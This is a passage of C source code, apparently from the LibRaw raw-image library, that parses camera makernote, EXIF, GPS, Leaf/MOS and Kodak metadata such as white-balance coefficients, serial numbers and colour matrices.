for (i=0; i<64; i++)
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] =
imgdata.color.WB_Coeffs[i][1] = imgdata.color.WB_Coeffs[i][3] = 0x100;
for (i=64; i<256; i++)
imgdata.color.WB_Coeffs[i][1] = imgdata.color.WB_Coeffs[i][3] = 0x100;
}
if ((tag >= 0x20400102) && (tag <= 0x2040010d))
{
ushort CT;
nWB = tag-0x20400102;
switch (nWB)
{
case 0 : CT = 3000; tWB = LIBRAW_WBI_Tungsten; break;
case 1 : CT = 3300; tWB = 0x100; break;
case 2 : CT = 3600; tWB = 0x100; break;
case 3 : CT = 3900; tWB = 0x100; break;
case 4 : CT = 4000; tWB = LIBRAW_WBI_FL_W; break;
case 5 : CT = 4300; tWB = 0x100; break;
case 6 : CT = 4500; tWB = LIBRAW_WBI_FL_D; break;
case 7 : CT = 4800; tWB = 0x100; break;
case 8 : CT = 5300; tWB = LIBRAW_WBI_FineWeather; break;
case 9 : CT = 6000; tWB = LIBRAW_WBI_Cloudy; break;
case 10: CT = 6600; tWB = LIBRAW_WBI_FL_N; break;
case 11: CT = 7500; tWB = LIBRAW_WBI_Shade; break;
default: CT = 0; tWB = 0x100;
}
if (CT)
{
imgdata.color.WBCT_Coeffs[nWB][0] = CT;
imgdata.color.WBCT_Coeffs[nWB][1] = get2();
imgdata.color.WBCT_Coeffs[nWB][3] = get2();
if (len == 4)
{
imgdata.color.WBCT_Coeffs[nWB][2] = get2();
imgdata.color.WBCT_Coeffs[nWB][4] = get2();
}
}
if (tWB != 0x100)
FORC4 imgdata.color.WB_Coeffs[tWB][c] = imgdata.color.WBCT_Coeffs[nWB][c+1];
}
if ((tag >= 0x20400113) && (tag <= 0x2040011e))
{
nWB = tag-0x20400113;
imgdata.color.WBCT_Coeffs[nWB][2] = imgdata.color.WBCT_Coeffs[nWB][4] = get2();
switch (nWB)
{
case 0: tWB = LIBRAW_WBI_Tungsten; break;
case 4: tWB = LIBRAW_WBI_FL_W; break;
case 6: tWB = LIBRAW_WBI_FL_D; break;
case 8: tWB = LIBRAW_WBI_FineWeather; break;
case 9: tWB = LIBRAW_WBI_Cloudy; break;
case 10: tWB = LIBRAW_WBI_FL_N; break;
case 11: tWB = LIBRAW_WBI_Shade; break;
default: tWB = 0x100;
}
if (tWB != 0x100)
imgdata.color.WB_Coeffs[tWB][1] = imgdata.color.WB_Coeffs[tWB][3] =
imgdata.color.WBCT_Coeffs[nWB][2];
}
if (tag == 0x20400121)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][2] = get2();
if (len == 4)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][1] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][3] = get2();
}
}
if (tag == 0x2040011f)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][3] = get2();
}
if (tag == 0x30000120)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][2] = get2();
if (len == 2)
{
for (int i=0; i<256; i++)
imgdata.color.WB_Coeffs[i][1] = imgdata.color.WB_Coeffs[i][3] = 0x100;
}
}
if (tag == 0x30000121)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][2] = get2();
}
if (tag == 0x30000122)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][2] = get2();
}
if (tag == 0x30000123)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][2] = get2();
}
if (tag == 0x30000124)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Sunset][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Sunset][2] = get2();
}
if (tag == 0x30000130)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][2] = get2();
}
if (tag == 0x30000131)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][2] = get2();
}
if (tag == 0x30000132)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][2] = get2();
}
if (tag == 0x30000133)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][2] = get2();
}
if((tag == 0x20400805) && (len == 2))
{
imgdata.makernotes.olympus.OlympusSensorCalibration[0]=getreal(type);
imgdata.makernotes.olympus.OlympusSensorCalibration[1]=getreal(type);
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.olympus.OlympusSensorCalibration[0];
}
if (tag == 0x20200401)
{
imgdata.other.FlashEC = getreal(type);
}
}
fseek(ifp,_pos2,SEEK_SET);
#endif
if (tag == 0x11 && is_raw && !strncmp(make,"NIKON",5)) {
fseek (ifp, get4()+base, SEEK_SET);
parse_tiff_ifd (base);
}
if (tag == 0x14 && type == 7) {
if (len == 2560) {
fseek (ifp, 1248, SEEK_CUR);
goto get2_256;
}
fread (buf, 1, 10, ifp);
if (!strncmp(buf,"NRW ",4)) {
fseek (ifp, strcmp(buf+4,"0100") ? 46:1546, SEEK_CUR);
cam_mul[0] = get4() << 2;
cam_mul[1] = get4() + get4();
cam_mul[2] = get4() << 2;
}
}
if (tag == 0x15 && type == 2 && is_raw)
fread (model, 64, 1, ifp);
if (strstr(make,"PENTAX")) {
if (tag == 0x1b) tag = 0x1018;
if (tag == 0x1c) tag = 0x1017;
}
if (tag == 0x1d) {
while ((c = fgetc(ifp)) && c != EOF)
#ifdef LIBRAW_LIBRARY_BUILD
{
if ((!custom_serial) && (!isdigit(c)))
{
if ((strbuflen(model) == 3) && (!strcmp(model,"D50")))
{
custom_serial = 34;
}
else
{
custom_serial = 96;
}
}
#endif
serial = serial*10 + (isdigit(c) ? c - '0' : c % 10);
#ifdef LIBRAW_LIBRARY_BUILD
}
if (!imgdata.shootinginfo.BodySerial[0])
sprintf(imgdata.shootinginfo.BodySerial, "%d", serial);
#endif
}
if (tag == 0x29 && type == 1) { // Canon PowerShot G9
c = wbi < 18 ? "012347800000005896"[wbi]-'0' : 0;
fseek (ifp, 8 + c*32, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1) ^ 1] = get4();
}
#ifndef LIBRAW_LIBRARY_BUILD
if (tag == 0x3d && type == 3 && len == 4)
FORC4 cblack[c ^ c >> 1] = get2() >> (14-tiff_bps);
#endif
if (tag == 0x81 && type == 4) {
data_offset = get4();
fseek (ifp, data_offset + 41, SEEK_SET);
raw_height = get2() * 2;
raw_width = get2();
filters = 0x61616161;
}
if ((tag == 0x81 && type == 7) ||
(tag == 0x100 && type == 7) ||
(tag == 0x280 && type == 1)) {
thumb_offset = ftell(ifp);
thumb_length = len;
}
if (tag == 0x88 && type == 4 && (thumb_offset = get4()))
thumb_offset += base;
if (tag == 0x89 && type == 4)
thumb_length = get4();
if (tag == 0x8c || tag == 0x96)
meta_offset = ftell(ifp);
if (tag == 0x97) {
for (i=0; i < 4; i++)
ver97 = ver97 * 10 + fgetc(ifp)-'0';
switch (ver97) {
case 100:
fseek (ifp, 68, SEEK_CUR);
FORC4 cam_mul[(c >> 1) | ((c & 1) << 1)] = get2();
break;
case 102:
fseek (ifp, 6, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1)] = get2();
break;
case 103:
fseek (ifp, 16, SEEK_CUR);
FORC4 cam_mul[c] = get2();
}
if (ver97 >= 200) {
if (ver97 != 205) fseek (ifp, 280, SEEK_CUR);
fread (buf97, 324, 1, ifp);
}
}
if (tag == 0xa1 && type == 7) {
order = 0x4949;
fseek (ifp, 140, SEEK_CUR);
FORC3 cam_mul[c] = get4();
}
if (tag == 0xa4 && type == 3) {
fseek (ifp, wbi*48, SEEK_CUR);
FORC3 cam_mul[c] = get2();
}
if (tag == 0xa7) { // shutter count
NikonKey = fgetc(ifp)^fgetc(ifp)^fgetc(ifp)^fgetc(ifp);
if ( (unsigned) (ver97-200) < 17) {
ci = xlat[0][serial & 0xff];
cj = xlat[1][NikonKey];
ck = 0x60;
for (i=0; i < 324; i++)
buf97[i] ^= (cj += ci * ck++);
i = "66666>666;6A;:;55"[ver97-200] - '0';
FORC4 cam_mul[c ^ (c >> 1) ^ (i & 1)] =
sget2 (buf97 + (i & -2) + c*2);
}
#ifdef LIBRAW_LIBRARY_BUILD
if ((NikonLensDataVersion > 200) && lenNikonLensData)
{
if (custom_serial)
{
ci = xlat[0][custom_serial];
}
else
{
ci = xlat[0][serial & 0xff];
}
cj = xlat[1][NikonKey];
ck = 0x60;
for (i = 0; i < lenNikonLensData; i++)
table_buf[i] ^= (cj += ci * ck++);
processNikonLensData(table_buf, lenNikonLensData);
lenNikonLensData = 0;
free(table_buf);
}
if (ver97 == 601) // Coolpix A
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
#endif
}
if(tag == 0xb001 && type == 3) // Sony ModelID
{
unique_id = get2();
}
if (tag == 0x200 && len == 3)
shot_order = (get4(),get4());
if (tag == 0x200 && len == 4)
FORC4 cblack[c ^ c >> 1] = get2();
if (tag == 0x201 && len == 4)
FORC4 cam_mul[c ^ (c >> 1)] = get2();
if (tag == 0x220 && type == 7)
meta_offset = ftell(ifp);
if (tag == 0x401 && type == 4 && len == 4)
FORC4 cblack[c ^ c >> 1] = get4();
#ifdef LIBRAW_LIBRARY_BUILD
// not corrected for file bitcount, to be patched in open_datastream
if (tag == 0x03d && strstr(make,"NIKON") && len == 4)
{
FORC4 cblack[c ^ c >> 1] = get2();
i = cblack[3];
FORC3 if(i>cblack[c]) i = cblack[c];
FORC4 cblack[c]-=i;
black += i;
}
#endif
if (tag == 0xe01) { /* Nikon Capture Note */
#ifdef LIBRAW_LIBRARY_BUILD
int loopc = 0;
#endif
order = 0x4949;
fseek (ifp, 22, SEEK_CUR);
for (offset=22; offset+22 < len; offset += 22+i) {
#ifdef LIBRAW_LIBRARY_BUILD
if(loopc++>1024)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
tag = get4();
fseek (ifp, 14, SEEK_CUR);
i = get4()-4;
if (tag == 0x76a43207) flip = get2();
else fseek (ifp, i, SEEK_CUR);
}
}
if (tag == 0xe80 && len == 256 && type == 7) {
fseek (ifp, 48, SEEK_CUR);
cam_mul[0] = get2() * 508 * 1.078 / 0x10000;
cam_mul[2] = get2() * 382 * 1.173 / 0x10000;
}
if (tag == 0xf00 && type == 7) {
if (len == 614)
fseek (ifp, 176, SEEK_CUR);
else if (len == 734 || len == 1502)
fseek (ifp, 148, SEEK_CUR);
else goto next;
goto get2_256;
}
if ((tag == 0x1011 && len == 9) || tag == 0x20400200)
for (i=0; i < 3; i++)
{
#ifdef LIBRAW_LIBRARY_BUILD
if (!imgdata.makernotes.olympus.ColorSpace)
{
FORC3 cmatrix[i][c] = ((short) get2()) / 256.0;
}
else
{
FORC3 imgdata.color.ccm[i][c] = ((short) get2()) / 256.0;
}
#else
FORC3 cmatrix[i][c] = ((short) get2()) / 256.0;
#endif
}
if ((tag == 0x1012 || tag == 0x20400600) && len == 4)
FORC4 cblack[c ^ c >> 1] = get2();
if (tag == 0x1017 || tag == 0x20400100)
cam_mul[0] = get2() / 256.0;
if (tag == 0x1018 || tag == 0x20400100)
cam_mul[2] = get2() / 256.0;
if (tag == 0x2011 && len == 2) {
get2_256:
order = 0x4d4d;
cam_mul[0] = get2() / 256.0;
cam_mul[2] = get2() / 256.0;
}
if ((tag | 0x70) == 0x2070 && (type == 4 || type == 13))
fseek (ifp, get4()+base, SEEK_SET);
#ifdef LIBRAW_LIBRARY_BUILD
// IB start
if (tag == 0x2010)
{
INT64 _pos3 = ftell(ifp);
parse_makernote(base, 0x2010);
fseek(ifp,_pos3,SEEK_SET);
}
if (
((tag == 0x2020) || (tag == 0x3000) || (tag == 0x2030) || (tag == 0x2031)) &&
((type == 7) || (type == 13)) &&
!strncasecmp(make,"Olympus",7)
)
{
INT64 _pos3 = ftell(ifp);
parse_makernote(base, tag);
fseek(ifp,_pos3,SEEK_SET);
}
// IB end
#endif
if ((tag == 0x2020) && ((type == 7) || (type == 13)) && !strncmp(buf,"OLYMP",5))
parse_thumb_note (base, 257, 258);
if (tag == 0x2040)
parse_makernote (base, 0x2040);
if (tag == 0xb028) {
fseek (ifp, get4()+base, SEEK_SET);
parse_thumb_note (base, 136, 137);
}
if (tag == 0x4001 && len > 500 && len < 100000) {
i = len == 582 ? 50 : len == 653 ? 68 : len == 5120 ? 142 : 126;
fseek (ifp, i, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1)] = get2();
for (i+=18; i <= len; i+=10) {
get2();
FORC4 sraw_mul[c ^ (c >> 1)] = get2();
if (sraw_mul[1] == 1170) break;
}
}
if(!strncasecmp(make,"Samsung",7))
{
if (tag == 0xa020) // get the full Samsung encryption key
for (i=0; i<11; i++) SamsungKey[i] = get4();
if (tag == 0xa021) // get and decode Samsung cam_mul array
FORC4 cam_mul[c ^ (c >> 1)] = get4() - SamsungKey[c];
#ifdef LIBRAW_LIBRARY_BUILD
if (tag == 0xa023)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][0] = get4() - SamsungKey[8];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][1] = get4() - SamsungKey[9];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][3] = get4() - SamsungKey[10];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][2] = get4() - SamsungKey[0];
if (imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][0] < (imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][1]>>1))
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][1] >> 4;
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][3] >> 4;
}
}
if (tag == 0xa024)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][c ^ (c >> 1)] = get4() - SamsungKey[c+1];
if (imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][0] < (imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][1]>>1))
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][1] >> 4;
imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][3] >> 4;
}
}
if (tag == 0xa025)
imgdata.color.linear_max[0]=
imgdata.color.linear_max[1]=
imgdata.color.linear_max[2]=
imgdata.color.linear_max[3]= get4() - SamsungKey[0];
if (tag == 0xa030 && len == 9)
for (i=0; i < 3; i++)
FORC3 imgdata.color.ccm[i][c] = (float)((short)((get4() + SamsungKey[i*3+c])))/256.0;
#endif
if (tag == 0xa031 && len == 9) // get and decode Samsung color matrix
for (i=0; i < 3; i++)
FORC3 cmatrix[i][c] = (float)((short)((get4() + SamsungKey[i*3+c])))/256.0;
if (tag == 0xa028)
FORC4 cblack[c ^ (c >> 1)] = get4() - SamsungKey[c];
}
else
{
// Somebody else use 0xa021 and 0xa028?
if (tag == 0xa021)
FORC4 cam_mul[c ^ (c >> 1)] = get4();
if (tag == 0xa028)
FORC4 cam_mul[c ^ (c >> 1)] -= get4();
}
if (tag == 0x4021 && get4() && get4())
FORC4 cam_mul[c] = 1024;
next:
fseek (ifp, save, SEEK_SET);
}
quit:
order = sorder;
}
/*
Since the TIFF DateTime string has no timezone information,
assume that the camera's clock was set to Universal Time.
*/
void CLASS get_timestamp (int reversed)
{
struct tm t;
char str[20];
int i;
str[19] = 0;
if (reversed)
for (i=19; i--; ) str[i] = fgetc(ifp);
else
fread (str, 19, 1, ifp);
memset (&t, 0, sizeof t);
if (sscanf (str, "%d:%d:%d %d:%d:%d", &t.tm_year, &t.tm_mon,
&t.tm_mday, &t.tm_hour, &t.tm_min, &t.tm_sec) != 6)
return;
t.tm_year -= 1900;
t.tm_mon -= 1;
t.tm_isdst = -1;
if (mktime(&t) > 0)
timestamp = mktime(&t);
}
void CLASS parse_exif (int base)
{
unsigned kodak, entries, tag, type, len, save, c;
double expo,ape;
kodak = !strncmp(make,"EASTMAN",7) && tiff_nifds < 3;
entries = get2();
if(!strncmp(make,"Hasselblad",10) && (tiff_nifds > 3) && (entries > 512)) return;
#ifdef LIBRAW_LIBRARY_BUILD
INT64 fsize = ifp->size();
#endif
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
#ifdef LIBRAW_LIBRARY_BUILD
INT64 savepos = ftell(ifp);
if(len > 8 && savepos + len > fsize*2) continue;
if(callbacks.exif_cb)
{
callbacks.exif_cb(callbacks.exifparser_data,tag,type,len,order,ifp);
fseek(ifp,savepos,SEEK_SET);
}
#endif
switch (tag) {
#ifdef LIBRAW_LIBRARY_BUILD
case 0xa405: // FocalLengthIn35mmFormat
imgdata.lens.FocalLengthIn35mmFormat = get2();
break;
case 0xa431: // BodySerialNumber
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
break;
case 0xa432: // LensInfo, 42034dec, Lens Specification per EXIF standard
imgdata.lens.MinFocal = getreal(type);
imgdata.lens.MaxFocal = getreal(type);
imgdata.lens.MaxAp4MinFocal = getreal(type);
imgdata.lens.MaxAp4MaxFocal = getreal(type);
break;
case 0xa435: // LensSerialNumber
stmread(imgdata.lens.LensSerial, len, ifp);
break;
case 0xc630: // DNG LensInfo, Lens Specification per EXIF standard
imgdata.lens.dng.MinFocal = getreal(type);
imgdata.lens.dng.MaxFocal = getreal(type);
imgdata.lens.dng.MaxAp4MinFocal = getreal(type);
imgdata.lens.dng.MaxAp4MaxFocal = getreal(type);
break;
case 0xa433: // LensMake
stmread(imgdata.lens.LensMake, len, ifp);
break;
case 0xa434: // LensModel
stmread(imgdata.lens.Lens, len, ifp);
if (!strncmp(imgdata.lens.Lens, "----", 4))
imgdata.lens.Lens[0] = 0;
break;
case 0x9205:
imgdata.lens.EXIF_MaxAp = libraw_powf64(2.0f, (getreal(type) / 2.0f));
break;
#endif
case 33434: tiff_ifd[tiff_nifds-1].t_shutter =
shutter = getreal(type); break;
case 33437: aperture = getreal(type); break; // 0x829d FNumber
case 34855: iso_speed = get2(); break;
case 34866:
if (iso_speed == 0xffff && (!strncasecmp(make, "SONY",4) || !strncasecmp(make, "CANON",5)))
iso_speed = getreal(type);
break;
case 36867:
case 36868: get_timestamp(0); break;
case 37377: if ((expo = -getreal(type)) < 128 && shutter == 0.)
tiff_ifd[tiff_nifds-1].t_shutter =
shutter = libraw_powf64(2.0, expo);
break;
case 37378: // 0x9202 ApertureValue
if ((fabs(ape = getreal(type))<256.0) && (!aperture))
aperture = libraw_powf64(2.0, ape/2);
break;
case 37385: flash_used = getreal(type); break;
case 37386: focal_len = getreal(type); break;
case 37500: // tag 0x927c
#ifdef LIBRAW_LIBRARY_BUILD
if (((make[0] == '\0') && (!strncmp(model, "ov5647",6))) ||
((!strncmp(make, "RaspberryPi",11)) && (!strncmp(model, "RP_OV5647",9))) ||
((!strncmp(make, "RaspberryPi",11)) && (!strncmp(model, "RP_imx219",9)))) {
char mn_text[512];
char *pos;
char ccms[512];
ushort l;
float num;
fgets(mn_text, MIN(len,511), ifp);
mn_text[511] = 0;
pos = strstr(mn_text, "gain_r=");
if (pos)
cam_mul[0] = atof(pos + 7);
pos = strstr(mn_text, "gain_b=");
if (pos)
cam_mul[2] = atof(pos + 7);
if ((cam_mul[0] > 0.001f) && (cam_mul[2] > 0.001f))
cam_mul[1] = cam_mul[3] = 1.0f;
else
cam_mul[0] = cam_mul[2] = 0.0f;
pos = strstr(mn_text, "ccm=");
if(pos)
{
pos +=4;
char *pos2 = strstr(pos, " ");
if(pos2)
{
l = pos2 - pos;
memcpy(ccms, pos, l);
ccms[l] = '\0';
#if defined WIN32 || defined(__MINGW32__)
// Win32 strtok is already thread-safe
pos = strtok(ccms, ",");
#else
char *last=0;
pos = strtok_r(ccms, ",",&last);
#endif
if(pos)
{
for (l = 0; l < 4; l++)
{
num = 0.0;
for (c = 0; c < 3; c++)
{
imgdata.color.ccm[l][c] = (float)atoi(pos);
num += imgdata.color.ccm[l][c];
#if defined WIN32 || defined(__MINGW32__)
pos = strtok(NULL, ",");
#else
pos = strtok_r(NULL, ",",&last);
#endif
if(!pos) goto end; // broken
}
if (num > 0.01)
FORC3 imgdata.color.ccm[l][c] = imgdata.color.ccm[l][c] / num;
}
}
}
}
end:;
}
else
#endif
parse_makernote (base, 0);
break;
case 40962: if (kodak) raw_width = get4(); break;
case 40963: if (kodak) raw_height = get4(); break;
case 41730:
if (get4() == 0x20002)
for (exif_cfa=c=0; c < 8; c+=2)
exif_cfa |= fgetc(ifp) * 0x01010101 << c;
}
fseek (ifp, save, SEEK_SET);
}
}
#ifdef LIBRAW_LIBRARY_BUILD
void CLASS parse_gps_libraw(int base)
{
unsigned entries, tag, type, len, save, c;
entries = get2();
if (entries > 200)
return;
if (entries > 0)
imgdata.other.parsed_gps.gpsparsed = 1;
while (entries--) {
tiff_get(base, &tag, &type, &len, &save);
if(len > 1024) continue; // no GPS tags are 1k or larger
switch (tag) {
case 1: imgdata.other.parsed_gps.latref = getc(ifp); break;
case 3: imgdata.other.parsed_gps.longref = getc(ifp); break;
case 5: imgdata.other.parsed_gps.altref = getc(ifp); break;
case 2:
if (len == 3)
FORC(3) imgdata.other.parsed_gps.latitude[c] = getreal(type);
break;
case 4:
if (len == 3)
FORC(3) imgdata.other.parsed_gps.longtitude[c] = getreal(type);
break;
case 7:
if (len == 3)
FORC(3) imgdata.other.parsed_gps.gpstimestamp[c] = getreal(type);
break;
case 6:
imgdata.other.parsed_gps.altitude = getreal(type);
break;
case 9: imgdata.other.parsed_gps.gpsstatus = getc(ifp); break;
}
fseek(ifp, save, SEEK_SET);
}
}
#endif
void CLASS parse_gps (int base)
{
unsigned entries, tag, type, len, save, c;
entries = get2();
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
if(len > 1024) continue; // no GPS tags are 1k or larger
switch (tag) {
case 1: case 3: case 5:
gpsdata[29+tag/2] = getc(ifp); break;
case 2: case 4: case 7:
FORC(6) gpsdata[tag/3*6+c] = get4(); break;
case 6:
FORC(2) gpsdata[18+c] = get4(); break;
case 18: case 29:
fgets ((char *) (gpsdata+14+tag/3), MIN(len,12), ifp);
}
fseek (ifp, save, SEEK_SET);
}
}
void CLASS romm_coeff (float romm_cam[3][3])
{
static const float rgb_romm[3][3] = /* ROMM == Kodak ProPhoto */
{ { 2.034193, -0.727420, -0.306766 },
{ -0.228811, 1.231729, -0.002922 },
{ -0.008565, -0.153273, 1.161839 } };
int i, j, k;
for (i=0; i < 3; i++)
for (j=0; j < 3; j++)
for (cmatrix[i][j] = k=0; k < 3; k++)
cmatrix[i][j] += rgb_romm[i][k] * romm_cam[k][j];
}
void CLASS parse_mos (int offset)
{
char data[40];
int skip, from, i, c, neut[4], planes=0, frot=0;
static const char *mod[] =
{ "","DCB2","Volare","Cantare","CMost","Valeo 6","Valeo 11","Valeo 22",
"Valeo 11p","Valeo 17","","Aptus 17","Aptus 22","Aptus 75","Aptus 65",
"Aptus 54S","Aptus 65S","Aptus 75S","AFi 5","AFi 6","AFi 7",
"AFi-II 7","Aptus-II 7","","Aptus-II 6","","","Aptus-II 10","Aptus-II 5",
"","","","","Aptus-II 10R","Aptus-II 8","","Aptus-II 12","","AFi-II 12" };
float romm_cam[3][3];
fseek (ifp, offset, SEEK_SET);
while (1) {
if (get4() != 0x504b5453) break;
get4();
fread (data, 1, 40, ifp);
skip = get4();
from = ftell(ifp);
// IB start
#ifdef LIBRAW_LIBRARY_BUILD
if (!strcmp(data,"CameraObj_camera_type")) {
stmread(imgdata.lens.makernotes.body, skip, ifp);
}
if (!strcmp(data,"back_serial_number")) {
char buffer [sizeof(imgdata.shootinginfo.BodySerial)];
char *words[4];
int nwords;
stmread(buffer, skip, ifp);
nwords = getwords(buffer, words, 4,sizeof(imgdata.shootinginfo.BodySerial));
strcpy (imgdata.shootinginfo.BodySerial, words[0]);
}
if (!strcmp(data,"CaptProf_serial_number")) {
char buffer [sizeof(imgdata.shootinginfo.InternalBodySerial)];
char *words[4];
int nwords;
stmread(buffer, skip, ifp);
nwords = getwords(buffer, words, 4,sizeof(imgdata.shootinginfo.InternalBodySerial));
strcpy (imgdata.shootinginfo.InternalBodySerial, words[0]);
}
#endif
// IB end
if (!strcmp(data,"JPEG_preview_data")) {
thumb_offset = from;
thumb_length = skip;
}
if (!strcmp(data,"icc_camera_profile")) {
profile_offset = from;
profile_length = skip;
}
if (!strcmp(data,"ShootObj_back_type")) {
fscanf (ifp, "%d", &i);
if ((unsigned) i < sizeof mod / sizeof (*mod))
strcpy (model, mod[i]);
}
if (!strcmp(data,"icc_camera_to_tone_matrix")) {
for (i=0; i < 9; i++)
((float *)romm_cam)[i] = int_to_float(get4());
romm_coeff (romm_cam);
}
if (!strcmp(data,"CaptProf_color_matrix")) {
for (i=0; i < 9; i++)
fscanf (ifp, "%f", (float *)romm_cam + i);
romm_coeff (romm_cam);
}
if (!strcmp(data,"CaptProf_number_of_planes"))
fscanf (ifp, "%d", &planes);
if (!strcmp(data,"CaptProf_raw_data_rotation"))
fscanf (ifp, "%d", &flip);
if (!strcmp(data,"CaptProf_mosaic_pattern"))
FORC4 {
fscanf (ifp, "%d", &i);
if (i == 1) frot = c ^ (c >> 1);
}
if (!strcmp(data,"ImgProf_rotation_angle")) {
fscanf (ifp, "%d", &i);
flip = i - flip;
}
if (!strcmp(data,"NeutObj_neutrals") && !cam_mul[0]) {
FORC4 fscanf (ifp, "%d", neut+c);
FORC3 cam_mul[c] = (float) neut[0] / neut[c+1];
}
if (!strcmp(data,"Rows_data"))
load_flags = get4();
parse_mos (from);
fseek (ifp, skip+from, SEEK_SET);
}
if (planes)
filters = (planes == 1) * 0x01010101 *
(uchar) "\x94\x61\x16\x49"[(flip/90 + frot) & 3];
}
void CLASS linear_table (unsigned len)
{
int i;
if (len > 0x10000) len = 0x10000;
read_shorts (curve, len);
for (i=len; i < 0x10000; i++)
curve[i] = curve[i-1];
maximum = curve[len<0x1000?0xfff:len-1];
}
#ifdef LIBRAW_LIBRARY_BUILD
void CLASS Kodak_WB_0x08tags (int wb, unsigned type)
{
float mul[3]={1,1,1}, num, mul2;
int c;
FORC3 mul[c] = (num=getreal(type))==0 ? 1 : num;
imgdata.color.WB_Coeffs[wb][1] = imgdata.color.WB_Coeffs[wb][3] = mul[1];
mul2 = mul[1] * mul[1];
imgdata.color.WB_Coeffs[wb][0] = mul2 / mul[0];
imgdata.color.WB_Coeffs[wb][2] = mul2 / mul[2];
return;
}
/* Thanks to Alexey Danilchenko for wb as-shot parsing code */
void CLASS parse_kodak_ifd (int base)
{
unsigned entries, tag, type, len, save;
int i, c, wbi=-2;
float mul[3]={1,1,1}, num;
static const int wbtag[] = { 64037,64040,64039,64041,-1,-1,64042 };
entries = get2();
if (entries > 1024) return;
INT64 fsize = ifp->size();
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
INT64 savepos = ftell(ifp);
if(len > 8 && len + savepos > 2*fsize) continue;
if(callbacks.exif_cb)
{
callbacks.exif_cb(callbacks.exifparser_data,tag | 0x20000,type,len,order,ifp);
fseek(ifp,savepos,SEEK_SET);
}
if (tag == 1011) imgdata.other.FlashEC = getreal(type);
if (tag == 1020) wbi = getint(type);
if (tag == 1021 && len == 72) { /* WB set in software */
fseek (ifp, 40, SEEK_CUR);
FORC3 cam_mul[c] = 2048.0 / fMAX(1.0f,get2());
wbi = -2;
}
if (tag == 0x0848) Kodak_WB_0x08tags(LIBRAW_WBI_Daylight, type);
if (tag == 0x0849) Kodak_WB_0x08tags(LIBRAW_WBI_Tungsten, type);
if (tag == 0x084a) Kodak_WB_0x08tags(LIBRAW_WBI_Fluorescent, type);
if (tag == 0x084b) Kodak_WB_0x08tags(LIBRAW_WBI_Flash, type);
if (tag == 0x0e93) imgdata.color.linear_max[0] =
imgdata.color.linear_max[1] =
imgdata.color.linear_max[2] =
imgdata.color.linear_max[3] = get2();
if (tag == 0x09ce)
stmread(imgdata.shootinginfo.InternalBodySerial,len, ifp);
if (tag == 0xfa00)
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
if (tag == 0xfa27)
{
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c] = get4();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][1];
}
if (tag == 0xfa28)
{
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][c] = get4();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][1];
}
if (tag == 0xfa29)
{
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c] = get4();
